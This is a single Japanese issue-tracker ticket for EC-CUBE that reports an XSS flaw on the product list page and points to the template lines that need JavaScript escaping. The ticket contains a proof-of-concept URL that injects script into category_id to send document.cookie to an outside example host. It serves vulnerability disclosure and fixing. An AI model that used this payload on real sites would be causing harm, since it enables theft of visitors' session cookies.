id	summary	reporter	owner	description	type	status	priority	milestone	component	version	resolution	keywords	cc	modified_flg
152	商品一覧にXSS脆弱性	adachi	somebody	"http://demo.ec-cube.net/products/list.php?category_id=2'+window.open('http://www.example.com/?cookie='+document.cookie)+'

html/user_data/templates/list.tplの44行目・229行目の、

<!--{$smarty.server.REQUEST_URI|escape}-->で、

javascriptのエスケープを行う必要がある。
"	バグ指摘	closed	中	EC-CUBE	フロント	1.3系	無効